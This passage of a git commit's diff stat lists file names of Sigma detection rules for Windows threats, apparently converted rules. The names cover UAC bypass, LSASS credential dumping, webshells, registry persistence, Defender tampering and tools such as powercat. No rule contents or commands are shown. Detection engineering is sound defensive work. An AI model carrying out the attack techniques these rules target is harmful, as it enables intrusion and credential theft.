+ ...oc_creation_win_sysinternals_psservice.yml | 31 + ...n_win_sysinternals_pssuspend_execution.yml | 34 + ..._sysinternals_pssuspend_susp_execution.yml | 36 + ...proc_creation_win_sysinternals_sdelete.yml | 38 + ..._sysinternals_susp_psexec_paexec_flags.yml | 76 + ..._win_sysinternals_sysmon_config_update.yml | 33 + ...tion_win_sysinternals_sysmon_uninstall.yml | 34 + ...on_win_sysinternals_tools_masquerading.yml | 180 + .../proc_creation_win_sysprep_appdata.yml | 29 + ...proc_creation_win_systeminfo_execution.yml | 29 + ...ettingsadminflows_turn_on_dev_features.yml 
| 36 + ...roc_creation_win_takeown_recursive_own.yml | 35 + ...proc_creation_win_tapinstall_execution.yml | 33 + .../proc_creation_win_tar_compression.yml | 38 + .../proc_creation_win_tar_extraction.yml | 35 + .../proc_creation_win_taskkill_sep.yml | 35 + ..._creation_win_tasklist_basic_execution.yml | 29 + .../proc_creation_win_taskmgr_localsystem.yml | 28 + ...reation_win_taskmgr_susp_child_process.yml | 34 + ...ms_suspicious_command_line_cred_access.yml | 34 + ...on_win_tpmvscmgr_add_virtual_smartcard.yml | 28 + .../proc_creation_win_tscon_localsystem.yml | 32 + .../proc_creation_win_tscon_rdp_redirect.yml | 31 + ...eation_win_tscon_rdp_session_hijacking.yml | 28 + ..._creation_win_uac_bypass_changepk_slui.yml | 34 + .../proc_creation_win_uac_bypass_cleanmgr.yml | 32 + .../proc_creation_win_uac_bypass_cmstp.yml | 44 + ...win_uac_bypass_cmstp_com_object_access.yml | 44 + ...eation_win_uac_bypass_computerdefaults.yml | 35 + ...eation_win_uac_bypass_consent_comctl32.yml | 32 + .../proc_creation_win_uac_bypass_dismhost.yml | 34 + ...on_win_uac_bypass_eventvwr_recentviews.yml | 35 + ...proc_creation_win_uac_bypass_fodhelper.yml | 32 + ...n_uac_bypass_hijacking_firwall_snap_in.yml | 29 + ...roc_creation_win_uac_bypass_icmluautil.yml | 34 + ...ion_win_uac_bypass_idiagnostic_profile.yml | 32 + .../proc_creation_win_uac_bypass_ieinstal.yml | 33 + ...c_creation_win_uac_bypass_msconfig_gui.yml | 32 + ...tion_win_uac_bypass_ntfs_reparse_point.yml | 42 + ...oc_creation_win_uac_bypass_pkgmgr_dism.yml | 32 + .../proc_creation_win_uac_bypass_sdclt.yml | 30 + ...oc_creation_win_uac_bypass_trustedpath.yml | 28 + .../proc_creation_win_uac_bypass_winsat.yml | 32 + .../proc_creation_win_uac_bypass_wmp.yml | 37 + .../proc_creation_win_uac_bypass_wsreset.yml | 37 + ...win_uac_bypass_wsreset_integrity_level.yml | 33 + .../proc_creation_win_ultravnc.yml | 29 + ...c_creation_win_ultravnc_susp_execution.yml | 34 + ...ation_win_uninstall_crowdstrike_falcon.yml | 30 + 
..._win_userinit_uncommon_child_processes.yml | 56 + .../proc_creation_win_vaultcmd_list_creds.yml | 30 + .../proc_creation_win_verclsid_runs_com.yml | 36 + ...proc_creation_win_virtualbox_execution.yml | 41 + ...n_win_virtualbox_vboxdrvinst_execution.yml | 39 + ...ion_win_vmware_toolbox_cmd_persistence.yml | 36 + ...in_vmware_toolbox_cmd_persistence_susp.yml | 43 + ...win_vmware_vmtoolsd_susp_child_process.yml | 62 + ...n_win_vscode_child_processes_anomalies.yml | 58 + ...c_creation_win_vscode_tunnel_execution.yml | 41 + ...eation_win_vscode_tunnel_remote_shell_.yml | 40 + ...on_win_vscode_tunnel_renamed_execution.yml | 55 + ...tion_win_vscode_tunnel_service_install.yml | 32 + ...tion_win_vsdiagnostics_execution_proxy.yml | 33 + ..._win_vslsagent_agentextensionpath_load.yml | 32 + .../proc_creation_win_w32tm.yml | 35 + ...ab_execution_from_non_default_location.yml | 36 + .../proc_creation_win_wab_unusual_parents.yml | 41 + ...n_win_wbadmin_delete_systemstatebackup.yml | 36 + ...proc_creation_win_webdav_lnk_execution.yml | 39 + .../proc_creation_win_webshell_chopper.yml | 40 + .../proc_creation_win_webshell_hacking.yml | 105 + ..._webshell_recon_commands_and_processes.yml | 107 + ...ll_susp_process_spawned_from_webserver.yml | 92 + .../proc_creation_win_webshell_tool_recon.yml | 57 + ...reation_win_werfault_lsass_shtinkering.yml | 46 + ...ion_win_werfault_reflect_debugger_exec.yml | 34 + ...creation_win_wermgr_susp_child_process.yml | 51 + ...creation_win_wermgr_susp_exec_location.yml | 36 + ...c_creation_win_wget_download_direct_ip.yml | 65 + ...get_download_susp_file_sharing_domains.yml | 91 + ..._creation_win_where_browser_data_recon.yml | 46 + ...proc_creation_win_whoami_all_execution.yml | 34 + .../proc_creation_win_whoami_execution.yml | 32 + ...hoami_execution_from_high_priv_process.yml | 38 + ...c_creation_win_whoami_groups_discovery.yml | 31 + .../proc_creation_win_whoami_output.yml | 37 + ...roc_creation_win_whoami_parent_anomaly.yml | 46 + 
...roc_creation_win_whoami_priv_discovery.yml | 33 + ...ion_win_windows_terminal_susp_children.yml | 70 + ..._creation_win_winget_add_custom_source.yml | 38 + ..._win_winget_add_insecure_custom_source.yml | 41 + ...tion_win_winget_add_susp_custom_source.yml | 42 + ..._win_winget_local_install_via_manifest.yml | 42 + ...oc_creation_win_winrar_exfil_dmp_files.yml | 39 + ...creation_win_winrar_susp_child_process.yml | 50 + ...n_win_winrar_uncommon_folder_execution.yml | 40 + .../proc_creation_win_winrm_awl_bypass.yml | 37 + ..._execution_via_scripting_api_winrm_vbs.yml | 36 + ...inrm_remote_powershell_session_process.yml | 33 + ..._creation_win_winrm_susp_child_process.yml | 38 + ...eation_win_winzip_password_compression.yml | 35 + ..._wmi_backdoor_exchange_transport_agent.yml | 33 + ..._wmi_persistence_script_event_consumer.yml | 30 + ...eation_win_wmic_eventconsumer_creation.yml | 33 + ...c_creation_win_wmic_namespace_defender.yml | 32 + ...roc_creation_win_wmic_process_creation.yml | 38 + ...creation_win_wmic_recon_computersystem.yml | 31 + ...proc_creation_win_wmic_recon_csproduct.yml | 31 + .../proc_creation_win_wmic_recon_group.yml | 34 + .../proc_creation_win_wmic_recon_hotfix.yml | 31 + .../proc_creation_win_wmic_recon_process.yml | 36 + .../proc_creation_win_wmic_recon_product.yml | 31 + ..._creation_win_wmic_recon_product_class.yml | 34 + .../proc_creation_win_wmic_recon_service.yml | 37 + ...on_win_wmic_recon_system_info_uncommon.yml | 45 + ...win_wmic_recon_unquoted_service_search.yml | 39 + ...roc_creation_win_wmic_remote_execution.yml | 39 + ...creation_win_wmic_service_manipulation.yml | 35 + ...oc_creation_win_wmic_squiblytwo_bypass.yml | 47 + ...wmic_susp_execution_via_office_process.yml | 69 + ...reation_win_wmic_susp_process_creation.yml | 60 + ...reation_win_wmic_terminate_application.yml | 35 + ...reation_win_wmic_uninstall_application.yml | 35 + ...n_win_wmic_uninstall_security_products.yml | 90 + ...reation_win_wmic_xsl_script_processing.yml | 
45 + ...creation_win_wmiprvse_spawning_process.yml | 46 + ...reation_win_wmiprvse_spawns_powershell.yml | 42 + ...tion_win_wmiprvse_susp_child_processes.yml | 69 + ...ation_win_wpbbin_potential_persistence.yml | 28 + ...eation_win_wscript_cscript_script_exec.yml | 42 + ...n_wscript_cscript_susp_child_processes.yml | 55 + ...script_cscript_uncommon_extension_exec.yml | 46 + ...tion_win_wsl_child_processes_anomalies.yml | 55 + ...proc_creation_win_wsl_lolbin_execution.yml | 55 + ...ion_win_wsl_windows_binaries_execution.yml | 28 + .../proc_creation_win_wuauclt_dll_loading.yml | 53 + ...ion_win_wuauclt_no_cli_flags_execution.yml | 33 + ...creation_win_wusa_cab_files_extraction.yml | 26 + ...a_cab_files_extraction_from_susp_paths.yml | 36 + ...reation_win_wusa_susp_parent_execution.yml | 46 + .../proc_tampering_susp_process_hollowing.yml | 40 + ..._susp_disk_access_using_uncommon_tools.yml | 69 + .../registry_add_malware_netwire.yml | 33 + .../registry_add_malware_ursnif.yml | 35 + ...egistry_add_persistence_amsi_providers.yml | 35 + ...gistry_add_persistence_com_key_linking.yml | 35 + ...persistence_disk_cleanup_handler_entry.yml | 69 + ...e_logon_scripts_userinitmprlogonscript.yml | 29 + ...dd_pua_sysinternals_execution_via_eula.yml | 29 + ...ysinternals_renamed_execution_via_eula.yml | 73 + ...a_sysinternals_susp_execution_via_eula.yml | 44 + ...delete_exploit_guard_protected_folders.yml | 28 + .../registry_delete_mstsc_history_cleared.yml | 34 + ...istry_delete_removal_amsi_registry_key.yml | 31 + ...ete_removal_com_hijacking_registry_key.yml | 71 + ...asks_hide_task_via_index_value_removal.yml | 35 + ...chtasks_hide_task_via_sd_value_removal.yml | 33 + .../registry_event_add_local_hidden_user.yml | 32 + .../registry_event_apt_leviathan.yml | 28 + ...registry_event_apt_oceanlotus_registry.yml | 50 + .../registry_event_apt_oilrig_mar18.yml | 46 + .../registry_event_apt_pandemic.yml | 38 + .../registry_event_bypass_via_wsreset.yml | 37 + 
...stry_event_cmstp_execution_by_registry.yml | 37 + ...y_events_logging_adding_reg_key_minint.yml | 40 + ...event_disable_wdigest_credential_guard.yml | 33 + ...entutl_volume_shadow_copy_service_keys.yml | 33 + .../registry_event_hack_wce_reg.yml | 31 + ...t_hybridconnectionmgr_svc_installation.yml | 33 + .../registry_event_mal_azorult.yml | 38 + .../registry_event_mal_flowcloud.yml | 34 + ...registry_event_malware_qakbot_registry.yml | 29 + ...gistry_event_mimikatz_printernightmare.yml | 51 + ...y_event_modify_screensaver_binary_path.yml | 36 + ...ry_event_narrator_feedback_persistance.yml | 34 + .../registry_event_net_ntlm_downgrade.yml | 38 + ..._dll_added_to_appcertdlls_registry_key.yml | 41 + ...dll_added_to_appinit_dlls_registry_key.yml | 38 + .../registry_event_office_test_regadd.yml | 30 + ...event_office_trust_record_modification.yml | 35 + ...registry_event_persistence_recycle_bin.yml | 36 + .../registry_event_portproxy_registry_key.yml | 35 + .../registry_event_redmimicry_winnti_reg.yml | 30 + .../registry_event_runkey_winekey.yml | 35 + .../registry_event_runonce_persistence.yml | 40 + ...try_event_shell_open_keys_manipulation.yml | 46 + ...registry_event_silentprocessexit_lsass.yml | 34 + .../registry_event_ssp_added_lsa_config.yml | 36 + ...registry_event_stickykey_like_backdoor.yml | 42 + .../registry_event_susp_atbroker_change.yml | 42 + .../registry_event_susp_download_run_key.yml | 34 + .../registry_event_susp_lsass_dll_load.yml | 39 + .../registry_event_susp_mic_cam_access.yml | 45 + ...gistry_set_enable_anonymous_connection.yml | 27 + ...stry_set_add_load_service_in_safe_mode.yml | 37 + .../registry_set_add_port_monitor.yml | 44 + .../registry_set_aedebug_persistence.yml | 30 + ...et_allow_rdp_remote_assistance_feature.yml | 28 + .../registry_set_amsi_com_hijack.yml | 30 + ...set_asep_reg_keys_modification_classes.yml | 66 + ..._set_asep_reg_keys_modification_common.yml | 79 + ...eg_keys_modification_currentcontrolset.yml | 71 + 
...p_reg_keys_modification_currentversion.yml | 150 + ...eg_keys_modification_currentversion_nt.yml | 92 + ...eg_keys_modification_internet_explorer.yml | 58 + ..._set_asep_reg_keys_modification_office.yml | 87 + ..._reg_keys_modification_session_manager.yml | 49 + ...p_reg_keys_modification_system_scripts.yml | 46 + ...et_asep_reg_keys_modification_winsock2.yml | 46 + ...asep_reg_keys_modification_wow6432node.yml | 108 + ..._keys_modification_wow6432node_classes.yml | 54 + ...odification_wow6432node_currentversion.yml | 47 + .../registry_set_bginfo_custom_db.yml | 27 + .../registry_set_bginfo_custom_vbscript.yml | 31 + .../registry_set_bginfo_custom_wmi_query.yml | 31 + .../registry_set_blackbyte_ransomware.yml | 32 + ...y_set_bypass_uac_using_delegateexecute.yml | 31 + ...istry_set_bypass_uac_using_eventviewer.yml | 30 + ...et_bypass_uac_using_silentcleanup_task.yml | 30 + .../registry_set_change_rdp_port.yml | 32 + .../registry_set_change_security_zones.yml | 36 + ...stry_set_change_sysmon_driver_altitude.yml | 29 + ...gistry_set_change_winevt_channelaccess.yml | 39 + .../registry_set_chrome_extension.yml | 136 + .../registry_set_clickonce_trust_prompt.yml | 35 + ...stry_set_cobaltstrike_service_installs.yml | 43 + .../registry_set_comhijack_sdclt.yml | 29 + .../registry_set_crashdump_disabled.yml | 28 + ...istry_set_creation_service_susp_folder.yml | 53 + ...y_set_creation_service_uncommon_folder.yml | 49 + ...file_open_handler_powershell_execution.yml | 30 + ...try_set_cve_2020_1048_new_printer_port.yml | 35 + ...gistry_set_cve_2022_30190_msdt_follina.yml | 28 + ...try_set_dbgmanageddebugger_persistence.yml | 30 + .../registry_set_defender_exclusions.yml | 30 + ...registry_set_desktop_background_change.yml | 52 + ...pervisorenforcedcodeintegrity_disabled.yml | 33 + .../registry_set_dhcp_calloutdll.yml | 32 + ...istry_set_disable_administrative_share.yml | 31 + ...gistry_set_disable_autologger_sessions.yml | 38 + ...registry_set_disable_defender_firewall.yml | 
32 + .../registry_set_disable_function_user.yml | 49 + ...stry_set_disable_macroruntimescanscope.yml | 33 + ...et_disable_privacy_settings_experience.yml | 28 + ..._disable_security_center_notifications.yml | 28 + .../registry_set_disable_system_restore.yml | 33 + .../registry_set_disable_uac_registry.yml | 29 + ...y_set_disable_windows_defender_service.yml | 29 + .../registry_set_disable_windows_firewall.yml | 30 + .../registry_set_disable_winevt_logging.yml | 50 + ...it_guard_net_protection_on_ms_defender.yml | 28 + ...t_disabled_microsoft_defender_eventlog.yml | 28 + ...d_pua_protection_on_microsoft_defender.yml | 28 + ...amper_protection_on_microsoft_defender.yml | 33 + .../registry_set_disallowrun_execution.yml | 28 + ...sk_cleanup_handler_autorun_persistence.yml | 53 + .../registry_set_dns_over_https_enabled.yml | 41 + ...gistry_set_dns_server_level_plugin_dll.yml | 34 + .../registry_set_dot_net_etw_tamper.yml | 49 + ...et_enabling_cor_profiler_env_variables.yml | 35 + .../registry_set_enabling_turnoffcheck.yml | 28 + .../registry_set_evtx_file_key_tamper.yml | 30 + ...ry_set_exploit_guard_susp_allowed_apps.yml | 35 + .../registry_set_fax_change_service_user.yml | 30 + .../registry_set_fax_dll_persistance.yml | 32 + .../registry_set_file_association_exefile.yml | 27 + ...egistry_set_hangs_debugger_persistence.yml | 27 + .../registry_set_hhctrl_persistence.yml | 29 + .../registry_set_hidden_extention.yml | 33 + .../registry_set/registry_set_hide_file.yml | 30 + .../registry_set_hide_function_user.yml | 38 + ...t_hide_scheduled_task_via_index_tamper.yml | 37 + ...urity_zone_protocol_defaults_downgrade.yml | 36 + ...registry_set_ime_non_default_extension.yml | 36 + .../registry_set_ime_suspicious_paths.yml | 52 + ...stry_set_install_root_or_ca_certificat.yml | 39 + ...t_explorer_disable_first_run_customize.yml | 36 + .../registry_set_legalnotice_susp_message.yml | 33 + ...y_set_lolbin_onedrivestandaloneupdater.yml | 29 + 
...egistry_set_lsa_disablerestrictedadmin.yml | 34 + .../registry_set_lsass_usermode_dumping.yml | 32 + .../registry_set/registry_set_mal_adwind.yml | 31 + .../registry_set_mal_blue_mockingbird.yml | 31 + ...istry_set_net_cli_ngenassemblyusagelog.yml | 30 + ...tsh_help_dll_persistence_susp_location.yml | 53 + ...netsh_helper_dll_potential_persistence.yml | 34 + ...registry_set_new_application_appcompat.yml | 30 + .../registry_set_new_network_provider.yml | 41 + .../registry_set_odbc_driver_registered.yml | 38 + ...gistry_set_odbc_driver_registered_susp.yml | 53 + ...registry_set_office_access_vbom_tamper.yml | 33 + ...office_disable_protected_view_features.yml | 47 + .../registry_set_office_enable_dde.yml | 35 + ...ook_enable_load_macro_provider_on_boot.yml | 32 + ..._office_outlook_enable_macro_execution.yml | 32 + ...utlook_enable_unsafe_client_mail_rules.yml | 34 + ...y_set_office_outlook_security_settings.yml | 33 + ..._set_office_trust_record_susp_location.yml | 40 + ...y_set_office_trusted_location_uncommon.yml | 49 + ...egistry_set_office_vba_warnings_tamper.yml | 33 + ...ce_app_cpmpat_layer_registerapprestart.yml | 30 + .../registry_set_persistence_app_paths.yml | 55 + ...registry_set_persistence_appx_debugger.yml | 32 + .../registry_set_persistence_autodial_dll.yml | 27 + .../registry_set_persistence_chm.yml | 29 + ...rsistence_com_hijacking_susp_locations.yml | 41 + ..._persistence_comhijack_psfactorybuffer.yml | 34 + ...et_persistence_custom_protocol_handler.yml | 39 + ...et_persistence_event_viewer_events_asp.yml | 47 + .../registry_set_persistence_globalflags.yml | 44 + .../registry_set_persistence_ie.yml | 45 + .../registry_set_persistence_ifilter.yml | 76 + ...registry_set_persistence_lsa_extension.yml | 29 + .../registry_set_persistence_mpnotify.yml | 27 + .../registry_set_persistence_mycomputer.yml | 27 + ...istry_set_persistence_natural_language.yml | 37 + .../registry_set_persistence_office_vsto.yml | 50 + 
...istry_set_persistence_outlook_homepage.yml | 37 + ...stry_set_persistence_outlook_todaypage.yml | 41 + ...gistry_set_persistence_reflectdebugger.yml | 31 + .../registry_set_persistence_scrobj_dll.yml | 28 + .../registry_set_persistence_search_order.yml | 95 + ...registry_set_persistence_shim_database.yml | 35 + ...istence_shim_database_susp_application.yml | 40 + ...stence_shim_database_uncommon_location.yml | 33 + .../registry_set_persistence_typed_paths.yml | 31 + .../registry_set_persistence_xll.yml | 31 + ...istry_set_policies_associations_tamper.yml | 43 + ...gistry_set_policies_attachments_tamper.yml | 36 + .../registry_set_powershell_as_service.yml | 31 + ...y_set_powershell_enablescripts_enabled.yml | 29 + ...gistry_set_powershell_execution_policy.yml | 46 + .../registry_set_powershell_in_run_keys.yml | 49 + ...gistry_set_powershell_logging_disabled.yml | 37 + ...egistry_set_provisioning_command_abuse.yml | 36 + ...set_renamed_sysinternals_eula_accepted.yml | 61 + .../registry_set_rpcrt4_etw_tamper.yml | 32 + ...stry_set_scr_file_executed_by_rundll32.yml | 36 + .../registry_set_servicedll_hijack.yml | 39 + .../registry_set_services_etw_tamper.yml | 29 + .../registry_set_set_nopolicies_user.yml | 38 + .../registry_set_sip_persistence.yml | 47 + .../registry_set_sophos_av_tamper.yml | 31 + .../registry_set_special_accounts.yml | 33 + ...ry_set_suppress_defender_notifications.yml | 28 + ...registry_set_susp_keyboard_layout_load.yml | 35 + ...y_set_susp_pendingfilerenameoperations.yml | 39 + .../registry_set_susp_printer_driver.yml | 39 + ...stry_set_susp_reg_persist_explorer_run.yml | 35 + .../registry_set_susp_run_key_img_folder.yml | 46 + .../registry_set_susp_service_installed.yml | 41 + .../registry_set_susp_user_shell_folders.yml | 30 + .../registry_set_suspicious_env_variables.yml | 65 + .../registry_set_system_lsa_nolmhash.yml | 34 + .../registry_set_taskcache_entry.yml | 60 + .../registry_set_telemetry_persistence.yml | 54 + 
...egistry_set_terminal_server_suspicious.yml | 43 + ...registry_set_terminal_server_tampering.yml | 67 + .../registry_set_timeproviders_dllname.yml | 34 + ...y_set_tls_protocol_old_version_enabled.yml | 29 + .../registry_set_treatas_persistence.yml | 43 + .../registry_set_turn_on_dev_features.yml | 36 + .../registry_set_uac_bypass_eventvwr.yml | 30 + .../registry_set_uac_bypass_sdclt.yml | 33 + .../registry_set_uac_bypass_winsat.yml | 31 + .../registry_set_uac_bypass_wmp.yml | 29 + .../registry_set_vbs_payload_stored.yml | 45 + .../registry_set_wab_dllpath_reg_change.yml | 31 + ..._set_wdigest_enable_uselogoncredential.yml | 30 + .../registry_set_windows_defender_tamper.yml | 66 + ...ry_set_winget_admin_settings_tampering.yml | 30 + ...istry_set_winget_enable_local_manifest.yml | 28 + ...set_winlogon_allow_multiple_tssessions.yml | 32 + .../registry_set_winlogon_notify_key.yml | 30 + .../sysmon/sysmon_config_modification.yml | 28 + .../sysmon_config_modification_error.yml | 38 + .../sysmon_config_modification_status.yml | 34 + .../sysmon/sysmon_file_block_executable.yml | 25 + .../sysmon/sysmon_file_block_shredding.yml | 24 + .../sysmon_file_executable_detected.yml | 25 + ...e_remote_thread_win_powershell_generic.yml | 35 + .../file_delete_win_zone_identifier_ads.yml | 32 + .../file_event_win_dump_file_creation.yml | 29 + ...file_event_win_scheduled_task_creation.yml | 35 + .../file_event_win_susp_binary_dropper.yml | 124 + ...ile_event_win_vscode_tunnel_indicators.yml | 28 + ...file_event_win_webdav_tmpfile_creation.yml | 41 + .../image_load_dll_amsi_uncommon_process.yml | 54 + .../image_load_dll_system_drawing_load.yml | 29 + .../image_load_office_excel_xll_load.yml | 28 + ...ad_wmi_module_load_by_uncommon_process.yml | 64 + ...net_connection_win_dfsvc_suspicious_ip.yml | 56 + ...eated_sysinternals_psexec_default_pipe.yml | 36 + ...roc_access_win_lsass_powershell_access.yml | 36 + ...c_access_win_lsass_susp_source_process.yml | 141 + 
..._access_win_lsass_uncommon_access_flag.yml | 115 + .../proc_creation_win_csc_compilation.yml | 34 + .../proc_creation_win_curl_download.yml | 41 + .../proc_creation_win_curl_execution.yml | 33 + .../proc_creation_win_curl_fileupload.yml | 44 + .../proc_creation_win_curl_useragent.yml | 38 + ...roc_creation_win_dfsvc_child_processes.yml | 28 + ..._creation_win_diskshadow_child_process.yml | 41 + ...oc_creation_win_diskshadow_script_mode.yml | 46 + ...oc_creation_win_findstr_password_recon.yml | 40 + .../proc_creation_win_net_quic.yml | 38 + ...roc_creation_win_office_svchost_parent.yml | 39 + ...n_powershell_abnormal_commandline_size.yml | 37 + ...eation_win_powershell_crypto_namespace.yml | 49 + ..._creation_win_powershell_import_module.yml | 44 + ...on_win_regsvr32_dllregisterserver_exec.yml | 59 + ...reation_win_rundll32_dllregisterserver.yml | 43 + ...c_creation_win_susp_compression_params.yml | 42 + ...reation_win_susp_elevated_system_shell.yml | 45 + ...proc_creation_win_susp_event_log_query.yml | 52 + ...win_susp_file_permission_modifications.yml | 58 + .../proc_creation_win_taskkill_execution.yml | 40 + ...oc_creation_win_wmic_recon_system_info.yml | 71 + ...registry_event_scheduled_task_creation.yml | 37 + .../registry_set_office_trusted_location.yml | 39 + ...gistry_set_powershell_crypto_namespace.yml | 49 + .../dns_query_win_possible_dns_rebinding.yml | 48 + ...load_invoke_obfuscation_clip+_services.yml | 32 + ...ke_obfuscation_obfuscated_iex_services.yml | 36 + ...oad_invoke_obfuscation_stdin+_services.yml | 32 + ..._load_invoke_obfuscation_var+_services.yml | 33 + ...voke_obfuscation_via_compress_services.yml | 38 + ...invoke_obfuscation_via_rundll_services.yml | 36 + ..._invoke_obfuscation_via_stdin_services.yml | 32 + ...voke_obfuscation_via_use_clip_services.yml | 32 + ...oke_obfuscation_via_use_mshta_services.yml | 38 + ..._obfuscation_via_use_rundll32_services.yml | 41 + ..._invoke_obfuscation_via_var++_services.yml | 32 + 
...tstrike_getsystem_service_installation.yml | 59 + .../driver_load_tap_driver_installation.yml | 28 + ...ript_creation_by_office_using_file_ext.yml | 51 + ...image_load_mimikatz_inmemory_detection.yml | 47 + ..._correlation_apt_silence_downloader_v3.yml | 44 + ..._correlation_apt_turla_commands_medium.yml | 38 + ...tion_dnscat2_powershell_implementation.yml | 40 + ...tion_win_correlation_multiple_susp_cli.yml | 68 + ...orrelation_susp_builtin_commands_recon.yml | 50 + ...d_cmd_and_powershell_spawned_processes.yml | 42 + .../sysmon_non_priv_program_files_move.yml | 37 + ..._party_drivers_exploits_token_stealing.yml | 30 + ...ivilege_escalation_using_rotten_potato.yml | 39 + ...uspicious_werfault_connection_outbound.yml | 49 + .../sysmon_wmi_event_subscription.yml | 31 + .../sysmon_wmi_susp_encoded_scripts.yml | 38 + .../wmi_event/sysmon_wmi_susp_scripting.yml | 50 + 8114 files changed, 203724 insertions(+), 30214 deletions(-) create mode 100644 tools/sigmac/converted_rules/builtin/application/Other/win_av_relevant_match.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/application_error/win_application_msmpeng_crash_error.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/application_error/win_werfault_susp_lsass_credential_dump.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/esent/win_esent_ntdsutil_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/esent/win_esent_ntdsutil_abuse_susp_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/microsoft_windows_backup/win_susp_backup_delete.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/microsoft_windows_software_restriction_policies/win_software_restriction_policies_block.yml create mode 100644 
tools/sigmac/converted_rules/builtin/application/msiinstaller/win_builtin_remove_application.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/msiinstaller/win_msi_install_from_susp_locations.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/msiinstaller/win_msi_install_from_web.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/msiinstaller/win_software_atera_rmm_agent_install.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_add_sysadmin_account.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_failed_logon.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_failed_logon_from_external_network.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_sp_procoption_set.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_xp_cmdshell_audit_log.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_xp_cmdshell_change.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_command_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_file_transfer.yml create mode 100644 tools/sigmac/converted_rules/builtin/application_error_reporting/win_application_msmpeng_crash_wer.yml create mode 100644 tools/sigmac/converted_rules/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml create mode 100644 tools/sigmac/converted_rules/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml create mode 100644 
tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_applocker_block.yml create mode 100644 tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml create mode 100644 tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_policy_block.yml create mode 100644 tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml create mode 100644 tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml create mode 100644 tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml create mode 100644 tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml create mode 100644 tools/sigmac/converted_rules/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml create mode 100644 tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_job_via_bitsadmin.yml create mode 100644 tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_job_via_powershell.yml create mode 100644 tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_saving_susp_extensions.yml create mode 100644 tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml create mode 100644 tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml create mode 100644 tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml create mode 100644 tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_trasnfer_susp_local_folder.yml create mode 100644 tools/sigmac/converted_rules/builtin/capi2/win_capi2_acquire_certificate_private_key.yml create mode 100644 
tools/sigmac/converted_rules/builtin/category/antivirus/av_exploiting.yml create mode 100644 tools/sigmac/converted_rules/builtin/category/antivirus/av_hacktool.yml create mode 100644 tools/sigmac/converted_rules/builtin/category/antivirus/av_password_dumper.yml create mode 100644 tools/sigmac/converted_rules/builtin/category/antivirus/av_ransomware.yml create mode 100644 tools/sigmac/converted_rules/builtin/category/antivirus/av_relevant_files.yml create mode 100644 tools/sigmac/converted_rules/builtin/category/antivirus/av_webshell.yml create mode 100644 tools/sigmac/converted_rules/builtin/certificate_services_client_lifecycle_system/win_certificateservicesclient_lifecycle_system_cert_exported.yml create mode 100644 tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml create mode 100644 tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_blocked_protected_process_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_enforced_policy_block.yml create mode 100644 tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml create mode 100644 tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_driver_loaded.yml create mode 100644 tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_image_blocked.yml create mode 100644 tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_revoked_image_loaded.yml create mode 100644 tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_unsigned_driver_loaded.yml create mode 100644 tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_unsigned_image_loaded.yml create mode 100644 tools/sigmac/converted_rules/builtin/code_integrity/win_codeintegrity_whql_failure.yml create mode 100644 tools/sigmac/converted_rules/builtin/deprecated/posh_pm_powercat.yml create mode 100644 
